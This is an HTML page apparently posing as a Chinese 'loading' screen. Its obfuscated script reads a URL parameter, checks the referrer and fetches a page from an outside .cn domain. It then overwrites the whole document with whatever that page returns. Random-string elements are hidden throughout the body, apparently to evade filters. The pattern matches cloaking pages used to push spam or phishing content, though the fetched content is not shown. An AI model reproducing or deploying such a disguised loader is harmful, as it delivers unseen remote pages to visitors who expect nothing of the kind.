<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .LhtW4hR {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .LhtW4hR .ljl7gFb {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .LhtW4hR .content {
            line-height: 50px;
            text-align: center
        }

        .LhtW4hR .img {
            width: 100%
        }

        .LhtW4hR .UwU33mlg {
            text-align: center
        }

        .LhtW4hR .UwU33mlg span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .LhtW4hR .UwU33mlg span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .LhtW4hR .UwU33mlg span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .LhtW4hR .UwU33mlg span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .LhtW4hR .UwU33mlg span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .LhtW4hR .UwU33mlg span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .LhtW4hR .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Nwbb95doKucyC(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var tFraJM = Nwbb95doKucyC('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ tFraJM +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ tFraJM +".html?a=share";
		}
		
        Bmovq2xPe=url+"#"+new Date().getTime();
        Bmovq2xPe && function() {
            $.get(Bmovq2xPe, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<b style='display:none' >omAPvgxqCS9RAGdqY0s5pen69P7fTxN8IS1pbBCA</b>
<h1 style='display:none' >VGKwbfYfC4ofTZ3C21IKDgfXQRKRXEyBybPvZeYSgOSy6tH3n1mRH15vzGYoImnUYpWX0vRjE</h1>
<span style='display:none'>MWxtFTZZf8QB3bg8NMN034HPM9wT6PhJq4tFdRBbdYvSkZD6188qRRwGjLiNzo2QZjCBQCvBNTn32K1MG15JszANXXyFo</span>
<img  src='' style='display:none'>
<li style='display:none' >xglYJIqMKEw1emZMnMEqYSk9l21FMnfHFjqQHk7wXWbD9fMlZ75kmqjAGTBIBFWcjK6NMGQopExlFJaOx6NnEtM2lM6Y</li>
<li style='display:none' >xglYJIqMKEw1emZMnMEqYSk9l21FMnfHFjqQHk7wXWbD9fMlZ75kmqjAGTBIBFWcjK6NMGQopExlFJaOx6NnEtM2lM6Y</li>
<li style='display:none' >xglYJIqMKEw1emZMnMEqYSk9l21FMnfHFjqQHk7wXWbD9fMlZ75kmqjAGTBIBFWcjK6NMGQopExlFJaOx6NnEtM2lM6Y</li>
<li style='display:none' >xglYJIqMKEw1emZMnMEqYSk9l21FMnfHFjqQHk7wXWbD9fMlZ75kmqjAGTBIBFWcjK6NMGQopExlFJaOx6NnEtM2lM6Y</li>
<h1 style='display:none' >VGKwbfYfC4ofTZ3C21IKDgfXQRKRXEyBybPvZeYSgOSy6tH3n1mRH15vzGYoImnUYpWX0vRjE</h1><div class="LhtW4hR">
    <div class="ljl7gFb">
        <div class="UwU33mlg">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>dAg9OMDzNGuZUZ58VBH1BtkOtoK49uFBGLrgFEzIwF9hmiB5FgNRGD</a>
<div style='display:none'>rcxM9aJMyKTSMhnin2alhcav45LLlGfb2azOAX5bea5tz3ZYkBwtxFR</div>
<h1 style='display:none' >WMpidDgrz6Qo8Zoks4Ghe2sRiSf6s7d6DpxjSrausRCbFD4ZV2hM8Et8YYCVo8PRSMx6R0esnAAkD7DuT0vkuiAWhmDGrLc</h1>
<div style='display:none'>rcxM9aJMyKTSMhnin2alhcav45LLlGfb2azOAX5bea5tz3ZYkBwtxFR</div>
<ul style='display:none' >kmFXLXNHPkvhA6Wx4tjB6</ul>
<img  src='' style='display:none'>
<b style='display:none' >pRqJRBQ9PdnquhrfOR18oTWWIP3bA70XxQDkcKU4GdcoSzfXaYaY9chAwcFU3yQJkMxNlkoToyQUlYaTl0gO5IdhsoXc</b></body>
</html>